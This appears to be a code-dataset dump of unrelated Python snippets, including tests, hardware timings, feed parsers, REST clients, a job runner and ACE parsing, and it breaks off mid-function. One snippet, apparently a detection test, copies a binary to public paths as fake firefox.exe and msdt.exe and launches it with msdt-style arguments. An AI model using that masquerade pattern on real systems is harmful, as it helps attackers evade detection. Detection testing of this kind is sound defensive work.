code stringlengths 281 23.7M |
|---|
class TestOrderAsStack(TestCase):
    """Verify that IntPool returns items in LIFO order when order_as_stack=True."""

    mode = 'static'

    def setUp(self):
        # Small pool so the stack ordering is easy to observe.
        self.pool = IntPool(max_size=3, order_as_stack=True)

    def test_ordering(self):
        """The item returned last must be handed out first (stack order)."""
        first = self.pool.get()
        second = self.pool.get()
        self.pool.put(first)
        self.pool.put(second)
        self.assertEqual(second, self.pool.get())
        self.assertEqual(first, self.pool.get())
class MT41K64M16(DDR3Module):
    """Micron MT41K64M16 DDR3 chip: geometry plus technology and speedgrade timings."""
    nbanks = 8
    nrows = 8192
    ncols = 1024
    # tREFI: average periodic refresh interval. DDR3 retention is 64 ms spread
    # over 8192 refresh commands -> 64e6 ns / 8192 (~7.8 us). The original
    # "(.0 / 8192)" evaluates to 0.0 (a truncated "64e6"), which would make
    # the controller refresh continuously.
    technology_timings = _TechnologyTimings(tREFI=(64e6 / 8192), tWTR=(4, 7.5), tCCD=(4, None), tRRD=(4, 10), tZQCS=(64, 80))
    speedgrade_timings = {'800': _SpeedgradeTimings(tRP=13.1, tRCD=13.1, tWR=13.1, tRFC=(64, None), tFAW=(None, 50), tRAS=37.5), '1066': _SpeedgradeTimings(tRP=13.1, tRCD=13.1, tWR=13.1, tRFC=(86, None), tFAW=(None, 50), tRAS=37.5), '1333': _SpeedgradeTimings(tRP=13.5, tRCD=13.5, tWR=13.5, tRFC=(107, None), tFAW=(None, 45), tRAS=36), '1600': _SpeedgradeTimings(tRP=13.75, tRCD=13.75, tWR=13.75, tRFC=(128, None), tFAW=(None, 40), tRAS=35)}
    # Fall back to the fastest grade when no explicit speedgrade is requested.
    speedgrade_timings['default'] = speedgrade_timings['1600']
@pytest.mark.integration_saas
@pytest.mark.integration_mailchimp
class TestSaasConnectorIntegration:
    """Integration checks for the SaaS connector against a Mailchimp config.

    NOTE(review): the two leading '.integration_*' fragments were pytest
    marker decorators whose '@pytest.mark' prefix was stripped; restored here.
    """

    def test_saas_connector(self, db: Session, mailchimp_connection_config, mailchimp_dataset_config):
        """A valid config connects successfully; a bad host raises ConnectionException."""
        connector = get_connector(mailchimp_connection_config)
        assert connector.__class__ == SaaSConnector
        assert connector.test_connection() == ConnectionTestStatus.succeeded
        # Break the connection secrets and verify the failure path.
        mailchimp_connection_config.secrets = {'domain': 'bad_host'}
        mailchimp_connection_config.save(db)
        connector = get_connector(mailchimp_connection_config)
        with pytest.raises(ConnectionException):
            connector.test_connection()
def extractWordofCraft(item):
    """Build a release message for a 'Word of Craft' feed item.

    Returns None for previews or items without any chapter/volume/fragment
    info, a release message for the known series, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    is_preview = 'preview' in item['title'].lower()
    if is_preview or not (chp or vol or frag):
        return None
    if 'Toaru Ossan no VRMMO katsudouki' in item['tags']:
        return buildReleaseMessageWithType(item, 'Toaru Ossan no VRMMO katsudouki', vol, chp, frag=frag, postfix=postfix)
    return False
class OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpass(Options):
    """Lowpass-filter mapping options for variwide sonification instruments."""

    def frequency(self) -> 'OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassFrequency':
        """Sub-configuration for the lowpass cutoff frequency."""
        sub = self._config_sub_data('frequency', OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassFrequency)
        return sub

    def resonance(self) -> 'OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassResonance':
        """Sub-configuration for the lowpass resonance."""
        sub = self._config_sub_data('resonance', OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassResonance)
        return sub
class DistributionRestClient(Distribution):
    """REST wrapper over the Cosmos distribution v1beta1 query endpoints."""

    API_URL = '/cosmos/distribution/v1beta1'

    def __init__(self, rest_api: RestClient) -> None:
        """Keep the REST transport used by every query method."""
        self._rest_api = rest_api

    def _query(self, path, response, *get_args):
        # Shared GET-then-Parse step used by all the endpoint methods below.
        raw = self._rest_api.get(f'{self.API_URL}{path}', *get_args)
        return Parse(raw, response)

    def CommunityPool(self) -> QueryCommunityPoolResponse:
        """Query the community pool."""
        return self._query('/community_pool', QueryCommunityPoolResponse())

    def DelegationTotalRewards(self, request: QueryDelegationTotalRewardsRequest) -> QueryDelegationTotalRewardsResponse:
        """Query all rewards accrued by a delegator."""
        return self._query(f'/delegators/{request.delegator_address}/rewards', QueryDelegationTotalRewardsResponse())

    def DelegationRewards(self, request: QueryDelegationRewardsRequest) -> QueryDelegationRewardsResponse:
        """Query rewards of a delegation with a specific validator."""
        return self._query(f'/delegators/{request.delegator_address}/rewards/{request.validator_address}', QueryDelegationRewardsResponse())

    def DelegatorValidators(self, request: QueryDelegatorValidatorsRequest) -> QueryDelegatorValidatorsResponse:
        """Query the validators of a delegator."""
        return self._query(f'/delegators/{request.delegator_address}/validators', QueryDelegatorValidatorsResponse())

    def DelegatorWithdrawAddress(self, request: QueryDelegatorWithdrawAddressRequest) -> QueryDelegatorWithdrawAddressResponse:
        """Query the withdraw address of a delegator."""
        return self._query(f'/delegators/{request.delegator_address}/withdraw_address', QueryDelegatorWithdrawAddressResponse())

    def Params(self) -> QueryParamsResponse:
        """Query the distribution module parameters."""
        return self._query('/params', QueryParamsResponse())

    def ValidatorCommission(self, request: QueryValidatorCommissionRequest) -> QueryValidatorCommissionResponse:
        """Query accumulated commission for a validator."""
        return self._query(f'/validators/{request.validator_address}/commission', QueryValidatorCommissionResponse())

    def ValidatorOutstandingRewards(self, request: QueryValidatorOutstandingRewardsRequest) -> QueryValidatorOutstandingRewardsResponse:
        """Query outstanding (un-withdrawn) rewards of a validator."""
        return self._query(f'/validators/{request.validator_address}/outstanding_rewards', QueryValidatorOutstandingRewardsResponse())

    def ValidatorSlashes(self, request: QueryValidatorSlashesRequest) -> QueryValidatorSlashesResponse:
        """Query slash events of a validator (extra args forwarded to the transport)."""
        return self._query(f'/validators/{request.validator_address}/slashes', QueryValidatorSlashesResponse(), request, ['validatorAddress'])
def test_parse_schema():
    """parse_schema marks its output and is idempotent on already-parsed input."""
    raw_schema = {
        'type': 'record',
        'name': 'test_parse_schema',
        'fields': [{'name': 'field', 'type': 'string'}],
    }
    parsed = parse_schema(raw_schema)
    assert '__fastavro_parsed' in parsed
    # Re-parsing an already-parsed schema must be a no-op.
    assert parse_schema(parsed) == parsed
@common.requires_os(*metadata.platforms)
def main():
    """Copy the test binary to fake 'firefox' and 'msdt' paths, run it with
    msdt-style arguments, then clean both copies up.

    NOTE(review): the bare '_os(*metadata.platforms)' line was a decorator
    whose '@common.requires' prefix was stripped; restored here — confirm.
    """
    firefox = 'C:\\Users\\Public\\firefox.exe'
    msdt = 'C:\\Users\\Public\\msdt.exe'
    common.copy_file(EXE_FILE, firefox)
    common.copy_file(EXE_FILE, msdt)
    # Launch the renamed binary with arguments mimicking an msdt invocation.
    common.execute([firefox, '/c', 'msdt.exe /c', 'echo', '/cab', 'C:\\Users\\Public\\'], timeout=10)
    common.remove_files(firefox, msdt)
def test_unwrapped_task():
    """The unwrapped-decorator script must fail with the expected ValueError."""
    env = {'SCRIPT_INPUT': '10', 'SYSTEMROOT': 'C:\\Windows', 'HOMEPATH': 'C:\\Windows'}
    proc = subprocess.run(
        [sys.executable, str(test_module_dir / 'unwrapped_decorator.py')],
        env=env,
        text=True,
        capture_output=True,
    )
    # Concatenate every stderr line that reports the ValueError, in order.
    error_str = ''.join(
        line for line in proc.stderr.strip().split('\n')
        if line.startswith('ValueError')
    )
    assert error_str.startswith('ValueError: TaskFunction cannot be a nested/inner or local function.')
class TxtRecord(Record):
    """A text-format record: parses raw text into a comment block plus entries
    and can serialize itself back to text.

    Fix: `from_string`/`from_fd` take `cls` and call `cls(tioconfig)` but were
    missing @classmethod, and `maybe_remove_last_empty_line` takes no `self`
    yet is invoked via `self.` in parse() — missing @staticmethod. Without the
    decorators every one of those calls raises TypeError.
    """

    def __init__(self, tioconfig):
        super(TxtRecord, self).__init__()
        self.tioconfig = tioconfig
        # Raw comment lines extracted from the top of the record text.
        self.comment_raw = None

    @classmethod
    def from_string(cls, in_str, rid, tioconfig):
        """Build a record by parsing `in_str` (must be unicode)."""
        Encoding.check_unicode(in_str)
        obj = cls(tioconfig)
        obj.parse(in_str, rid)
        return obj

    @classmethod
    def from_fd(cls, file_des, rid, tioconfig):
        """Build a record by reading and parsing an open file-like object."""
        obj = cls(tioconfig)
        obj.parse(file_des.read(), rid)
        return obj

    def write_fd(self, file_des):
        """Write every entry of this record to the given file-like object."""
        for element in self:
            element.write_fd(file_des)

    @staticmethod
    def maybe_remove_last_empty_line(split_lines):
        """Drop a trailing empty line (produced by a final newline), in place."""
        if split_lines and not split_lines[-1]:
            del split_lines[-1]

    def check_line_length(self, split_lines, rid):
        """Log an error and mark the record unusable for each over-long line."""
        max_line_length = self.tioconfig.get_max_line_length()
        for lineno, line in enumerate(split_lines, start=1):
            if len(line) > max_line_length:
                logger.error(LogFormatter.format(80, ('line too long: is [%d], max allowed [%d]' % (len(line), max_line_length)), rid, lineno))
                self._set_not_usable()

    def parse(self, record, rid):
        """Parse raw record text: validate encoding, split the leading comment
        from the entries, and append a TxtRecordEntry per parsed entry."""
        Encoding.check_unicode(record)
        split_lines = record.split('\n')
        self.check_line_length(split_lines, rid)
        self.maybe_remove_last_empty_line(split_lines)
        self.comment_raw = TxtParser.extract_record_comment(split_lines)
        for comment in self.comment_raw:
            Encoding.check_unicode(comment)
        self.set_comment(TxtParser.extract_comment(self.comment_raw))
        Encoding.check_unicode(self.get_comment())
        # Entries start right after the comment block (hence the +1 offset).
        (success, parsed_record) = TxtParser.split_entries(split_lines, rid, self, (len(self.comment_raw) + 1))
        if not success:
            self._set_not_usable()
            return
        for entry in parsed_record:
            self.append(TxtRecordEntry(entry))

    def to_string(self):
        """Serialize: the comment block first, then each entry in order."""
        rstring = TxtParser.add_newlines(self.comment_raw)
        for line in self:
            if isinstance(line, TxtRecordEntry):
                rstring += line.to_string()
            else:
                rstring += TxtRecordEntry.format_entry(line)
        return rstring
def main():
    """Remove build artifacts (all, or named contracts), recompile the project,
    and optionally print deployed-bytecode sizes for each contract."""
    args = docopt(__doc__)
    project_path = project.check_for_project('.')
    if project_path is None:
        raise ProjectNotFound
    build_path = project_path.joinpath(_load_project_structure_config(project_path)['build'])
    contract_artifact_path = build_path.joinpath('contracts')
    interface_artifact_path = build_path.joinpath('interfaces')
    if args['--all']:
        # Wipe every build artifact; missing dirs are fine.
        shutil.rmtree(contract_artifact_path, ignore_errors=True)
        shutil.rmtree(interface_artifact_path, ignore_errors=True)
    elif args['<contract>']:
        # Delete only the named contracts' artifacts.
        for name in args['<contract>']:
            path = contract_artifact_path.joinpath(f'{name}.json')
            if path.exists():
                path.unlink()
    proj = project.load()
    if args['--size']:
        print(' Deployment Bytecode Sizes ')
        codesize = []
        for contract in proj:
            bytecode = contract._build['deployedBytecode']
            if bytecode:
                # Hex string -> byte count.
                codesize.append((contract._name, len(bytecode) // 2))
        # Fix: guard against an empty list — max() over it raises ValueError.
        if codesize:
            indent = max(len(i[0]) for i in codesize)
            for name, size in sorted(codesize, key=lambda k: k[1], reverse=True):
                # 24577 = EIP-170 deployed-code size limit + 1; presumably the
                # denominator chosen so 100% means "at the limit" — confirm.
                pct = size / 24577
                pct_color = color(next((i[1] for i in CODESIZE_COLORS if pct >= i[0]), ''))
                print(f' {name:<{indent}} - {size:>6,}B ({pct_color}{pct:.2%}{color})')
        print()
    print(f'Project has been compiled. Build artifacts saved at {contract_artifact_path}')
def extractShuranomichiWordpressCom(item):
    """Build a release message for a shuranomichi.wordpress.com feed item.

    Returns None for previews or items without chapter/volume info, a release
    message when a tag or (for uncategorized items) a title matches a known
    series, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    lowered_title = item['title'].lower()
    if 'preview' in lowered_title or not (chp or vol):
        return None
    # First try tag-based matching.
    tag_releases = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tagname, name, tl_type in tag_releases:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    # Uncategorized posts fall back to title-based matching.
    if item['tags'] == ['Uncategorized']:
        title_releases = [
            ('The Consequence of Being Summoned Simultaneously From Another World Chapter ', 'The Consequence of Being Summoned Simultaneously From Another World', 'translated'),
            ('Tensei Shoujo no Rirekisho', 'Tensei Shoujo no Rirekisho', 'translated'),
            ('Master of Dungeon', 'Master of Dungeon', 'oel'),
        ]
        for titlecomponent, name, tl_type in title_releases:
            if titlecomponent.lower() in lowered_title:
                return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class WOFF2LocaTableTest(unittest.TestCase):
    """Tests for WOFF2LocaTable.compile() and how compiling drives
    head.indexToLocFormat (short vs long loca)."""

    def setUp(self):
        # Minimal font: head plus WOFF2 loca/glyf tables, no recalculation.
        self.font = font = ttLib.TTFont(recalcBBoxes=False, recalcTimestamp=False)
        font['head'] = ttLib.newTable('head')
        font['loca'] = WOFF2LocaTable()
        font['glyf'] = WOFF2GlyfTable()

    def test_compile_short_loca(self):
        # Short loca (indexFormat 0) stores offset/2 as uint16:
        # 65536 even offsets -> 65536 * 2 bytes.
        locaTable = self.font['loca']
        locaTable.set(list(range(0, 131072, 2)))
        self.font['glyf'].indexFormat = 0
        locaData = locaTable.compile(self.font)
        self.assertEqual(len(locaData), 131072)

    def test_compile_short_loca_overflow(self):
        # Offsets beyond 0x20000 cannot be represented in short format.
        locaTable = self.font['loca']
        locaTable.set(list(range((131072 + 1))))
        self.font['glyf'].indexFormat = 0
        with self.assertRaisesRegex(ttLib.TTLibError, 'indexFormat is 0 but local offsets > 0x20000'):
            locaTable.compile(self.font)

    def test_compile_short_loca_not_multiples_of_2(self):
        # Short format halves offsets, so odd offsets are rejected.
        locaTable = self.font['loca']
        locaTable.set([1, 3, 5, 7])
        self.font['glyf'].indexFormat = 0
        with self.assertRaisesRegex(ttLib.TTLibError, 'offsets not multiples of 2'):
            locaTable.compile(self.font)

    def test_compile_long_loca(self):
        # Long loca (indexFormat 1) stores each offset as uint32.
        locaTable = self.font['loca']
        locaTable.set(list(range(131073)))
        self.font['glyf'].indexFormat = 1
        locaData = locaTable.compile(self.font)
        self.assertEqual(len(locaData), (131073 * 4))

    def test_compile_set_indexToLocFormat_0(self):
        # Compiling small even offsets should select the short format in head.
        locaTable = self.font['loca']
        locaTable.set(list(range(0, 131072, 2)))
        locaTable.compile(self.font)
        newIndexFormat = self.font['head'].indexToLocFormat
        self.assertEqual(0, newIndexFormat)

    def test_compile_set_indexToLocFormat_1(self):
        # Few offsets but... compiling selects the long format here; then
        # offsets past the short-format limit must also stay long.
        locaTable = self.font['loca']
        locaTable.set(list(range(10)))
        locaTable.compile(self.font)
        newIndexFormat = self.font['head'].indexToLocFormat
        self.assertEqual(1, newIndexFormat)
        locaTable.set(list(range(0, (131072 + 1), 2)))
        locaTable.compile(self.font)
        newIndexFormat = self.font['head'].indexToLocFormat
        self.assertEqual(1, newIndexFormat)
def sync_domains(site, domains, bench_path='.'):
    """Update the site's `domains` config when the given list differs from the
    currently-configured domains. Returns True if an update was written.

    Args:
        site: site name to sync.
        domains: desired list of domain entries.
        bench_path: bench root to operate in (defaults to cwd).
    """
    changed = False
    existing_domains = get_domains_dict(get_domains(site, bench_path))
    new_domains = get_domains_dict(domains)
    if set(existing_domains.keys()) != set(new_domains.keys()):
        changed = True
    else:
        # Same domain names: check whether any entry's details differ.
        for d in list(existing_domains.values()):
            if d != new_domains.get(d['domain']):
                changed = True
                break
    if changed:
        # Fix: previously hard-coded bench_path='.' here, silently ignoring
        # the bench_path argument used for the read above.
        update_site_config(site, {'domains': domains}, bench_path=bench_path)
    return changed
def extractGolemcreationkitCom(item):
    """Build a release message for a golemcreationkit.com feed item.

    Returns None for previews or items without chapter/volume info, a release
    message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    is_preview = 'preview' in item['title'].lower()
    if is_preview or not (chp or vol):
        return None
    known_tags = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tagname, name, tl_type in known_tags:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class OptionSeriesOrganizationDragdrop(Options):
    """Drag/drop options for organization-series points.

    NOTE(review): each option appeared twice as plain `def`s of the same name
    (the second silently shadowing the first), which is plainly a stripped
    @property/@<name>.setter pair; the decorators are restored here.
    """

    @property
    def draggableX(self):
        """Whether points can be dragged in the X dimension."""
        return self._config_get(None)

    @draggableX.setter
    def draggableX(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def draggableY(self):
        """Whether points can be dragged in the Y dimension."""
        return self._config_get(None)

    @draggableY.setter
    def draggableY(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def dragHandle(self) -> 'OptionSeriesOrganizationDragdropDraghandle':
        """Sub-configuration for the drag handle."""
        return self._config_sub_data('dragHandle', OptionSeriesOrganizationDragdropDraghandle)

    @property
    def dragMaxX(self):
        """Maximum X value points can be dragged to."""
        return self._config_get(None)

    @dragMaxX.setter
    def dragMaxX(self, num: float):
        self._config(num, js_type=False)

    @property
    def dragMaxY(self):
        """Maximum Y value points can be dragged to."""
        return self._config_get(None)

    @dragMaxY.setter
    def dragMaxY(self, num: float):
        self._config(num, js_type=False)

    @property
    def dragMinX(self):
        """Minimum X value points can be dragged to."""
        return self._config_get(None)

    @dragMinX.setter
    def dragMinX(self, num: float):
        self._config(num, js_type=False)

    @property
    def dragMinY(self):
        """Minimum Y value points can be dragged to."""
        return self._config_get(None)

    @dragMinY.setter
    def dragMinY(self, num: float):
        self._config(num, js_type=False)

    @property
    def dragPrecisionX(self):
        """Drag precision in the X dimension (default 0)."""
        return self._config_get(0)

    @dragPrecisionX.setter
    def dragPrecisionX(self, num: float):
        self._config(num, js_type=False)

    @property
    def dragPrecisionY(self):
        """Drag precision in the Y dimension (default 0)."""
        return self._config_get(0)

    @dragPrecisionY.setter
    def dragPrecisionY(self, num: float):
        self._config(num, js_type=False)

    @property
    def dragSensitivity(self):
        """Pixels a point must be moved before a drag starts (default 2)."""
        return self._config_get(2)

    @dragSensitivity.setter
    def dragSensitivity(self, num: float):
        self._config(num, js_type=False)

    @property
    def groupBy(self):
        """Group-by key used for dragging."""
        return self._config_get(None)

    @groupBy.setter
    def groupBy(self, text: str):
        self._config(text, js_type=False)

    @property
    def guideBox(self) -> 'OptionSeriesOrganizationDragdropGuidebox':
        """Sub-configuration for the guide box drawn while dragging."""
        return self._config_sub_data('guideBox', OptionSeriesOrganizationDragdropGuidebox)

    @property
    def liveRedraw(self):
        """Whether the chart redraws live while dragging (default True)."""
        return self._config_get(True)

    @liveRedraw.setter
    def liveRedraw(self, flag: bool):
        self._config(flag, js_type=False)
class Runner():
    """Runs a list of Jobs concurrently on an asyncio event loop, reporting
    progress and aggregating return codes / error output."""

    def __init__(self, options: dict):
        # `options` is read for 'failfast' and 'container_runtime' below.
        self.options = options
        self.loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()

    def run_jobs(self, job_names, releases):
        """Build the job list from names/releases and execute it."""
        jobs = build_jobs_list(job_names, releases=releases, options=self.options)
        self._run_jobs(jobs)

    def _run_jobs(self, jobs: typing.List[Job]):
        """Run all jobs to completion; exits the process on failure.

        Exit codes: 3 when there are no jobs, otherwise the aggregated
        returncode computed in _process_results.
        """
        if (not jobs):
            click.echo('No jobs!', err=True)
            sys.exit(3)
        progress_reporter = ProgressReporter(jobs)
        progress_reporter.print_status()
        processes = [self.loop.create_task(j.run()) for j in jobs]
        # With failfast, stop waiting as soon as any job raises.
        return_when: str = asyncio.ALL_COMPLETED
        if self.options['failfast']:
            return_when = asyncio.FIRST_EXCEPTION
        future = asyncio.wait(processes, return_when=return_when)
        # Ctrl-C cancels all jobs rather than killing the loop outright.
        self.loop.add_signal_handler(signal.SIGINT, functools.partial(_cancel_jobs, jobs))
        try:
            (done, pending) = self.loop.run_until_complete(future)
            results = self._process_results(done, pending)
        finally:
            # Always stop leftover containers, even when interrupted.
            self._stop_all_jobs()
        # NOTE: only reached when the try body completed, so `results` is bound.
        if results['returncode']:
            click.echo(results['error_output'], err=True)
        sys.exit(results['returncode'])

    def _process_results(self, done, pending):
        """Collect results from finished tasks; cancel and drain pending ones.

        Returns a dict with 'error_output' (concatenated job output) and
        'returncode' (first non-zero code, or -SIGINT when interrupted).
        """
        returncode = 0
        error_output = ''
        if pending:
            # We got here via failfast/interrupt: cancel what is still running
            # and wait for the cancellations to settle.
            for task in pending:
                task.cancel()
            future = asyncio.wait(pending)
            (cancelled, pending) = self.loop.run_until_complete(future)
            done = (done | cancelled)
            returncode = (- signal.SIGINT)
        for task in done:
            try:
                result = task.result()
            except RuntimeError as e:
                # NOTE(review): assumes job failures surface as RuntimeError
                # carrying a `.result` attribute — confirm against Job.run().
                result = e.result
            if ((not result.cancelled) and result.returncode):
                if result.output:
                    error_output = f'''{error_output}
{result.output}'''
                if (not returncode):
                    returncode = result.returncode
        return {'error_output': error_output, 'returncode': returncode}

    def _stop_all_jobs(self):
        """Stop every container labeled with CONTAINER_LABEL via StopJob tasks."""
        args = [self.options['container_runtime'], 'ps', f'--filter=label={CONTAINER_LABEL}', '-q']
        processes = subprocess.check_output(args).decode()
        stop_jobs = [self.loop.create_task(StopJob(process).run()) for process in processes.split('\n') if process]
        if stop_jobs:
            stop_future = asyncio.wait(stop_jobs)
            self.loop.run_until_complete(stop_future)
class NotificationSettings(FidesSettings):
    """Settings controlling privacy-request subject notifications."""

    notification_service_type: Optional[str] = Field(default=None, description='Sets the notification service type used to send notifications. Accepts mailchimp_transactional, mailgun, twilio_sms, or twilio_email.')
    send_request_completion_notification: bool = Field(default=False, description='When set to True, enables subject notifications upon privacy request completion.')
    send_request_receipt_notification: bool = Field(default=False, description='When set to True, enables subject notifications upon privacy request receipt.')
    send_request_review_notification: bool = Field(default=False, description='When set to True, enables subject notifications upon privacy request review.')

    # NOTE(review): the bare "('notification_service_type', pre=True)" line was
    # a @validator decorator with its name stripped; restored here. Also note
    # the field description says 'twilio_sms' while the validator accepts
    # 'twilio_text' — confirm which value is intended.
    @validator('notification_service_type', pre=True)
    def validate_notification_service_type(cls, value: Optional[str]) -> Optional[str]:
        """Normalize to lowercase and reject unsupported service types."""
        if value:
            valid_values = ['mailgun', 'twilio_text', 'twilio_email', 'mailchimp_transactional']
            value = value.lower()
            if value not in valid_values:
                raise ValueError(f"Invalid NOTIFICATION_SERVICE_TYPE provided '{value}', must be one of: {', '.join([level for level in valid_values])}")
        return value

    class Config:
        env_prefix = ENV_PREFIX
def parse_aces(input_buffer, count):
    """Parse `count` ACEs (access control entries) from a binary buffer.

    Each ACE starts with a fixed 8-byte header (type, flags, size, access
    mask); 'Object' ACEs carry an extra flags dword plus optional GUIDs; the
    SID occupies the remainder of the entry. Returns a list of dicts.

    Fix: removed a duplicated `ace['SID'] = format_sid(...)` line that parsed
    the SID twice for every ACE.
    """
    out = []
    while len(out) < count:
        ace = dict()
        # Fixed ACE header: uint8 type, uint8 flags, uint16 size, uint32 mask.
        fields = ('Raw Type', 'Raw Flags', 'Size', 'Raw Access Required')
        for k, v in zip(fields, unpack('<BBHI', input_buffer[:8])):
            ace[k] = v
        ace['Type'] = parse_sddl_dacl_ace_type(ace['Raw Type'])
        ace['Access Required'] = parse_ace_access(ace['Raw Access Required'])
        offset = 8
        if ace['Type'].endswith('Object'):
            # Object ACEs add a flags dword and up to two optional GUIDs.
            fields = ('Raw Object Flags',)
            for k, v in zip(fields, unpack('<I', input_buffer[8:12])):
                ace[k] = v
            ace['Object Flags'] = parse_ace_object_flags(ace['Raw Object Flags'])
            offset = 12
            if ace['Object Flags']['Object Type Present']:
                ace['GUID'] = format_uuid_le(input_buffer[offset:(offset + 16)])
                offset += 16
            if ace['Object Flags']['Inherited Object Type Present']:
                ace['Inherited GUID'] = format_uuid_le(input_buffer[offset:(offset + 16)])
                offset += 16
        # The SID fills the rest of this ACE, up to its declared size.
        ace['SID'] = format_sid(input_buffer[offset:ace['Size']])
        input_buffer = input_buffer[ace['Size']:]
        out.append(ace)
    return out
class BasicFormatter(object):
    """Formats tick values into short label strings, optionally using
    scientific notation when values are very large or very small."""

    # Average expected label width in characters (used by callers/estimates).
    avg_label_width = 7.0
    # Whether scientific notation may be used at all.
    use_scientific = True
    # (low, high) powers of ten delimiting when scientific notation kicks in.
    scientific_limits = ((- 3), 5)

    def __init__(self, **kwds):
        # Accept any of the class attributes above as keyword overrides.
        self.__dict__.update(kwds)

    def oldformat(self, ticks, numlabels=None, char_width=None):
        """Legacy formatter: pick a printf format from the tick span and
        strip redundant zeros/exponent padding. `numlabels`/`char_width`
        are accepted for interface compatibility but unused here."""
        labels = []
        if (len(ticks) == 0):
            return []
        # d = overall span of the ticks; drives the format precision below.
        d = abs((ticks[(- 1)] - ticks[0]))
        for x in ticks:
            if ((abs(x) < 10000.0) and (x == int(x))):
                # Small integral values print as plain integers.
                labels.append(('%d' % x))
                continue
            if (d < 0.01):
                fmt = '%1.3e'
            elif (d < 0.1):
                fmt = '%1.3f'
            elif (d > 100000.0):
                fmt = '%1.1e'
            elif (d > 10):
                fmt = '%1.1f'
            elif (d > 1):
                fmt = '%1.2f'
            else:
                fmt = '%1.3f'
            s = (fmt % x)
            tup = s.split('e')
            if (len(tup) == 2):
                # Scientific form: trim trailing zeros from the mantissa and
                # leading zeros / '+' from the exponent.
                mantissa = tup[0].rstrip('0').rstrip('.')
                sign = tup[1][0].replace('+', '')
                exponent = tup[1][1:].lstrip('0')
                if (sign or exponent):
                    s = ('%se%s%s' % (mantissa, sign, exponent))
                else:
                    s = mantissa
            else:
                # Plain float: trim trailing zeros and a dangling point.
                s = s.rstrip('0').rstrip('.')
            labels.append(s)
        return labels

    def format(self, ticks, numlabels=None, char_width=None, fill_ratio=0.3):
        """Format ticks as strings; uses scientific notation when every tick
        is either a multiple of 10**high or no larger than 10**low (see
        scientific_limits). `numlabels` is unused; `char_width` caps the
        mantissa digits available per label."""
        if (len(ticks) == 0):
            return []
        ticks = asarray(ticks)
        if self.use_scientific:
            scientific = (((ticks % (10 ** self.scientific_limits[1])) == 0) | (abs(ticks) <= (10 ** self.scientific_limits[0]))).all()
        else:
            scientific = False
        if scientific:
            if (char_width is not None):
                # Budget characters across all labels, then split each label's
                # budget into exponent digits (emax) and mantissa digits (mmax).
                chars_per_label = int(((char_width * fill_ratio) / len(ticks)))
                maxtick = amax(abs(ticks))
                if (maxtick > 0):
                    exp_oom = str(int(floor(log10(maxtick))))
                else:
                    exp_oom = '0'
                emax = len(exp_oom)
                if (chars_per_label < emax):
                    # Not enough room even for the exponent: fall back to a
                    # minimal 3-character mantissa.
                    mmax = 3
                else:
                    mmax = ((chars_per_label - emax) - 1)
            else:
                # No width constraint: -1 means "no mantissa truncation".
                mmax = (- 1)
            labels = [self._nice_sci(x, mmax) for x in ticks]
        elif (not (ticks % 1).any()):
            # All ticks integral: print as ints.
            labels = list(map(str, ticks.astype(int)))
        else:
            labels = list(map(str, ticks))
        return labels

    def _nice_sci(self, val, mdigits, force_sign=False):
        """Return `val` in compact scientific form, truncating the mantissa
        to `mdigits` characters (when positive) and omitting 'e0'."""
        if (val != 0):
            e = int(floor(log10(abs(val))))
        else:
            e = 0
        m = (val / float((10 ** e)))
        m_str = str(m)
        if ((mdigits > 0) and ('.' in m_str)):
            # Keep at least the integer part, at most mdigits characters.
            max_len = max(m_str.index('.'), mdigits)
            m_str = m_str[:max_len]
            if (m_str[(- 1)] == '.'):
                m_str = m_str[:(- 1)]
        elif (m_str[(- 1)] == '.'):
            m_str = m_str[:(- 1)]
        if (force_sign and (not m_str.startswith('-'))):
            m_str = ('+' + m_str)
        if (e != 0):
            e_str = str(e)
            if (e_str.startswith('+') and (not force_sign)):
                e_str = e_str[1:]
            m_str += ('e' + e_str)
        return m_str

    def estimate_width(self, start, end, numlabels=None, char_width=None, fill_ratio=0.3, ticker=None):
        """Estimate (tick_count, total_label_width) for the range [start, end]
        using the average size of the endpoint labels.

        NOTE(review): if neither `numlabels` nor `char_width` is given,
        `initial_estimate`/`est_ticks` are never assigned and this raises
        UnboundLocalError — presumably callers always pass one of them;
        confirm before relying on other argument combinations.
        """
        if ((numlabels == 0) or (char_width == 0)):
            return (0, 0)
        labelsizes = map(len, self.format([start, end]))
        avg_size = (sum(labelsizes) / 2.0)
        if ticker:
            if numlabels:
                initial_estimate = numlabels
            elif char_width:
                initial_estimate = round(((fill_ratio * char_width) / avg_size))
            est_ticks = ticker.num_ticks(start, end, initial_estimate)
        elif numlabels:
            est_ticks = numlabels
        elif char_width:
            est_ticks = round(((fill_ratio * char_width) / avg_size))
        return (est_ticks, (est_ticks * avg_size))
@ml_group.command('delete-job')
@click.argument('job-name')
@click.argument('job-type')
@click.pass_context
def delete_job(ctx: click.Context, job_name, job_type, verbose=True):
    """Delete an ML job, data frame analytic, or datafeed by name.

    NOTE(review): the decorator lines lost their '@' and leading name
    fragments ('_group.command', bare argument tuples, '_context'); they are
    reconstructed here — confirm the group object and argument names.
    """
    es_client: Elasticsearch = ctx.obj['es']
    ml_client = MlClient(es_client)
    try:
        if job_type == 'anomaly_detection':
            ml_client.delete_job(job_name)
        elif job_type == 'data_frame_analytic':
            ml_client.delete_data_frame_analytics(job_name)
        elif job_type == 'datafeed':
            ml_client.delete_datafeed(job_name)
        else:
